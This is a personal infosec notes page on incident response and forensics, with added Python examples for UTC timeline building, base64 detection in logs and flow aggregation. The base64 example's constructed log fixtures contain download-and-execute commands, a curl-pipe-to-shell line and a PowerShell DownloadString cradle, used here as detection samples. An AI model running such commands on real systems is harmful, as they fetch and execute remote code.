akde/infosec

Information security is ultimately about managing risk


  • Since Windows 11, hard drive encryption (BitLocker device encryption) can be applied automatically if Windows detects that the hardware requirements are met. Users may not be aware that their storage is encrypted; check for it before imaging a disk, because the image is useless without the recovery key.
  • CAINE (a Linux live distribution for computer forensics) can be used for a first analysis.
  • Schrödinger's Incident: we do not know whether it is an incident until we have looked into it.
  • Terminology:
    • Incident Analysis
      • Impact analysis
    • Incident Response
      • Immediate reactions
      • Mandia et al. 2003 and "The investigative process" by Casey, 2004
    • Incident Handling
      • Controlling/Management
    • FPC: Full Packet Capture
    • PSTR: Packet String data (only the printable strings carried in network packets are logged, not the full payload)
  • Chain of custody: documentation of every step and insight, and of where, when and how each piece of evidence was retrieved. Important when the case goes to court.
  • Types of data
    • Persistent data
    • Volatile data
    • Very volatile data
  • (!) After patching a zero-day, also check whether the systems were already compromised before the patch was applied.
  • Specialized malware types:
    • Scareware: malicious software which threatens the user, for example by claiming an infection or the release of sensitive data, and offers a way to pay so that the threat is not carried out.
    • Adware: malicious software which loads advertisements so that ad platforms register traffic.
    • Spyware: malicious software which covertly collects and exfiltrates sensitive data.
  • Time zones are important to consider when documenting incidents. Use only one time zone (commonly UTC) for the whole timeline and check which time zone each tool writes its timestamps in.
  • There are emoji domains.
  • Also search for base64 patterns (in logs, scripts and command lines) and decode what you find.
  • Network packet data can be very useful, but storing it for a longer period is, obviously, very resource intensive.
    • Flow data can be a compromise: for some time, log only which systems talked to which other systems.
  • Logs should be protected like backups, also after a successful attack.
  • GitHub: redcanaryco/atomic-red-team: small and highly portable detection tests based on MITRE's ATT&CK (Atomic Red Team test library).
  • Suricata: network analysis tool (IDS/IPS).
  • The CFReDS portal (NIST's Computer Forensic Reference Data Sets) is a page with disk images which can be analyzed with filesystem forensics.
  • With GitHub: fox-it/dissect (Dissect is a digital forensics & incident response framework and toolset that allows you to quickly access and analyse forensic artefacts from various disk and file formats, developed by Fox-IT, part of NCC Group) you can scan images for interesting files.
  • See the forensic site with tools to learn.
  • Most malware wants to persist itself. Therefore, it is a good idea to search the possible persistence vectors.
  • Tip: when handling malware samples, change the file suffix to prevent accidental execution, e.g. bla.exe_
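The time-zone note above in practice: an added example (not code from this page or from any of the tools it mentions) that takes timestamps as different tools wrote them, some naive and some with an explicit offset, normalizes all of them to UTC and then sorts. The event sources, the timestamps and the "Europe/Berlin" assignment for the exported Windows log are constructed for illustration. The point it shows is that a naive timestamp must be assigned the time zone the tool is known to use, never guessed, and that sorting the raw strings would have put the EDR entry first although it happened last.

```python
from datetime import datetime, timezone
from typing import Optional
from zoneinfo import ZoneInfo

# Constructed sample events (not real logs): (source, timestamp exactly as the
# tool wrote it, time zone the tool is known to use, or None if the string
# carries its own offset). The source names are illustrative.
RAW_EVENTS = [
    ("win-evtx", "2024-05-01 12:03:10", "Europe/Berlin"),  # exported in local time (CEST, UTC+2)
    ("syslog", "2024-05-01T10:02:55Z", None),              # UTC with explicit Z
    ("edr", "2024-05-01T06:04:00-04:00", None),            # explicit offset (EDT)
    ("firewall", "2024-05-01 10:01:30", "UTC"),            # naive string, appliance set to UTC
]


def to_utc(ts: str, source_tz: Optional[str]) -> datetime:
    """Parse one timestamp and return an aware datetime in UTC.

    A naive timestamp is only accepted together with the time zone the tool is
    known to use. Guessing it is exactly the mistake the note warns about, so
    we raise instead of silently assuming the analyst's local time.
    """
    dt = datetime.fromisoformat(ts.replace("Z", "+00:00"))
    if dt.tzinfo is None:
        if source_tz is None:
            raise ValueError(f"naive timestamp {ts!r} without a known source time zone")
        dt = dt.replace(tzinfo=ZoneInfo(source_tz))
    return dt.astimezone(timezone.utc)


def build_timeline(events):
    """Normalize every event to UTC and order by true time of occurrence.

    Returns (utc string, source, original string) so the original value stays
    visible next to the normalized one, as a chain-of-custody record should.
    """
    rows = [(to_utc(ts, tz), src, ts) for src, ts, tz in events]
    rows.sort(key=lambda r: r[0])
    return [(dt.strftime("%Y-%m-%dT%H:%M:%SZ"), src, original) for dt, src, original in rows]


if __name__ == "__main__":
    for utc, src, original in build_timeline(RAW_EVENTS):
        print(f"{utc}  {src:<9} (tool wrote: {original})")
```

Run it and the Berlin export lands at 10:03:10Z and the EDR entry at 10:04:00Z, i.e. last, although "06:04:00" is the smallest string. Feeding `to_utc` a naive timestamp with no source time zone raises instead of guessing.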
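For the "search for base64 patterns" note, an added example (not code from this page) that scans log lines for runs of base64 alphabet characters, decodes each candidate and keeps only those that decode to printable text, trying UTF-16LE before UTF-8 because PowerShell's `-EncodedCommand` is UTF-16LE. The log lines are constructed inline; the two encoded payloads are generated in the code from plain strings so the expected decodes are known, and the hex-looking session token is there on purpose: it is a valid base64 string that decodes to garbage, the kind of false positive a plain grep turns up. The 20-character minimum is an arbitrary noise threshold, not a standard.

```python
import base64
import binascii
import re
import string

# Runs of base64 alphabet characters, at least 20 long, optionally padded.
# 20 is an arbitrary threshold: shorter runs are mostly ordinary words.
B64_RUN = re.compile(r"(?<![A-Za-z0-9+/])[A-Za-z0-9+/]{20,}={0,2}(?![A-Za-z0-9+/=])")

PRINTABLE = set(string.printable)


def _b64(s: str, enc: str = "utf-8") -> str:
    """Helper to build the constructed sample: encode s in enc, then base64."""
    return base64.b64encode(s.encode(enc)).decode("ascii")


# Constructed sample (not real logs). The hostname, IPs and commands are illustrative.
SHELL_CMD = "curl http://10.0.0.99/a | sh"
PS_CMD = "IEX (New-Object Net.WebClient).DownloadString('http://10.0.0.99/p')"
SAMPLE_LOG = "\n".join([
    "2024-05-01T10:00:01Z host1 sshd[1234]: Accepted password for bob from 10.0.0.5",
    f"2024-05-01T10:00:07Z host1 cron[2200]: CMD (echo {_b64(SHELL_CMD)} | base64 -d | sh)",
    f"2024-05-01T10:00:09Z host1 powershell: -EncodedCommand {_b64(PS_CMD, 'utf-16-le')}",
    "2024-05-01T10:00:11Z host1 app: session=deadbeefdeadbeefdeadbeef ok",
])


def _looks_like_text(raw: bytes):
    """Return (encoding, text) if raw decodes to printable text, else None.

    UTF-16LE is tried first: a UTF-16LE string of ASCII also decodes as UTF-8,
    but then with embedded NULs, which the printable check would reject anyway.
    """
    for enc in ("utf-16-le", "utf-8"):
        try:
            text = raw.decode(enc)
        except UnicodeDecodeError:
            continue
        if text and all(ch in PRINTABLE for ch in text):
            return enc, text
    return None


def find_base64(log_text: str):
    """Return one dict per decodable base64 candidate found in log_text."""
    hits = []
    for lineno, line in enumerate(log_text.splitlines(), start=1):
        for match in B64_RUN.finditer(line):
            token = match.group(0)
            # Logs often carry unpadded base64; restore padding before decoding.
            padded = token + "=" * (-len(token) % 4)
            try:
                raw = base64.b64decode(padded, validate=True)
            except (binascii.Error, ValueError):
                continue
            kind = _looks_like_text(raw)
            hits.append({
                "line": lineno,
                "token": token,
                "encoding": kind[0] if kind else "binary",  # "binary": decodes, but not to text
                "text": kind[1] if kind else None,
            })
    return hits


if __name__ == "__main__":
    for hit in find_base64(SAMPLE_LOG):
        print(f"line {hit['line']}: [{hit['encoding']}] {hit['text'] or hit['token'][:24] + '...'}")
```

On the sample, line 2 decodes as UTF-8 to the curl pipeline, line 3 as UTF-16LE to the PowerShell download cradle, and line 4 is reported as "binary" so an analyst can still look at it without it being mistaken for a command.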
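For the note on flow data as a compromise to full packet capture, an added example (not code from this page, and not the NetFlow/IPFIX format itself) that reduces a list of packet records to bidirectional flow records: one row per 5-tuple with packet and byte counts in each direction and first/last seen, which is what "which systems talked to which" needs while dropping the payload. The packet records are constructed inline, not captured traffic; the first packet seen in a flow is taken as the client side, which is an assumption that holds for a capture started before the connection.

```python
# Constructed packet records (not captured traffic):
# (timestamp, src ip, src port, dst ip, dst port, protocol, frame length)
PACKETS = [
    (1000.0, "10.0.0.5", 51234, "10.0.0.99", 80, "tcp", 74),
    (1000.1, "10.0.0.99", 80, "10.0.0.5", 51234, "tcp", 74),
    (1000.2, "10.0.0.5", 51234, "10.0.0.99", 80, "tcp", 66),
    (1000.3, "10.0.0.5", 51234, "10.0.0.99", 80, "tcp", 512),
    (1000.9, "10.0.0.99", 80, "10.0.0.5", 51234, "tcp", 1514),
    (1001.0, "10.0.0.5", 40000, "10.0.0.53", 53, "udp", 80),
    (1001.1, "10.0.0.53", 53, "10.0.0.5", 40000, "udp", 200),
    (1002.0, "10.0.0.7", 44444, "10.0.0.99", 4444, "tcp", 74),
]


def aggregate_flows(packets):
    """Collapse packets into bidirectional flows keyed on the 5-tuple.

    Both directions share one key (endpoints sorted), the first packet seen
    decides which endpoint is the client (assumption: capture started before
    the connection), and only counters and timestamps are kept, no payload.
    """
    flows = {}
    for ts, src, sport, dst, dport, proto, length in sorted(packets):
        key = (proto, *sorted([(src, sport), (dst, dport)]))
        flow = flows.get(key)
        if flow is None:
            flow = flows[key] = {
                "proto": proto,
                "client": (src, sport),
                "server": (dst, dport),
                "first": ts,
                "last": ts,
                "pkts": 0,
                "bytes_out": 0,  # client -> server
                "bytes_in": 0,   # server -> client
            }
        flow["last"] = ts
        flow["pkts"] += 1
        if (src, sport) == flow["client"]:
            flow["bytes_out"] += length
        else:
            flow["bytes_in"] += length
    return list(flows.values())


def host_pairs(flows):
    """The 'who talked to whom' view: (client ip, server ip, proto, server port)."""
    return {(f["client"][0], f["server"][0], f["proto"], f["server"][1]) for f in flows}


if __name__ == "__main__":
    flows = aggregate_flows(PACKETS)
    print(f"{len(PACKETS)} packets -> {len(flows)} flows")
    for f in flows:
        print(f"{f['proto']} {f['client'][0]}:{f['client'][1]} -> {f['server'][0]}:{f['server'][1]} "
              f"pkts={f['pkts']} out={f['bytes_out']} in={f['bytes_in']} "
              f"duration={f['last'] - f['first']:.1f}s")
```

Eight packets become three flow records. The third one, a single SYN-sized packet from 10.0.0.7 to port 4444 with nothing coming back, is the sort of thing flow data still surfaces long after the full capture would have been rotated away.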

About

Personal collection of some infosec stuff. Primary purpose of this site is to collect and organize for myself.

Note: Some content is not publicly visible due to copyright issues. Therefore, some links could be broken.
